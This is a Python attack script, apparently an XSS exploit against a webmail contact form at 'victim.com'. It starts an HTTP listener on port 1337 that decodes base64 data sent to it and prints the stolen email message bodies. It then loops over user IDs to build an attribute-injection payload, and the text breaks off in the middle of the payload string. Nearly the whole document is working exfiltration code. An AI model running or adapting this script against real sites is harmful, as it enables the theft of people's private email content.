import threading import time import requests import base64 from bs4 import BeautifulSoup from http.server import BaseHTTPRequestHandler, HTTPServer # --- HTTP Listener --- class RequestHandler(BaseHTTPRequestHandler): def Capture_Emails(self): if '?c=' in self.path: b64_data = self.path.split('?c=')[1] decoded = base64.b64decode(b64_data).decode('utf-8', 'ignore') soup = BeautifulSoup(decoded, 'html.parser') messagebody_div = soup.find('div', id='messagebody') if messagebody_div: print("\n[+] Captured Email Content:") print(messagebody_div.decode_contents()) else: print("\n[-] No messagebody div found") def listener(port=1337): server_address = ('', port) httpd = HTTPServer(server_address, RequestHandler) print(f"[*] Listening on port {port}...\n") httpd.serve_forever() # --- Start Listener --- listener_thread = threading.Thread(target=listener, daemon=True) listener_thread.start() time.sleep(1) # --- Attack Configuration --- TARGET_URL = "http://victim.com/contact" START_UID = 1 END_UID = 4 # --- Critical Fixes --- for uid in range(START_UID, END_UID + 1): # 1. Revert to original attribute injection (no quotes around style/event) malicious_payload = ( f'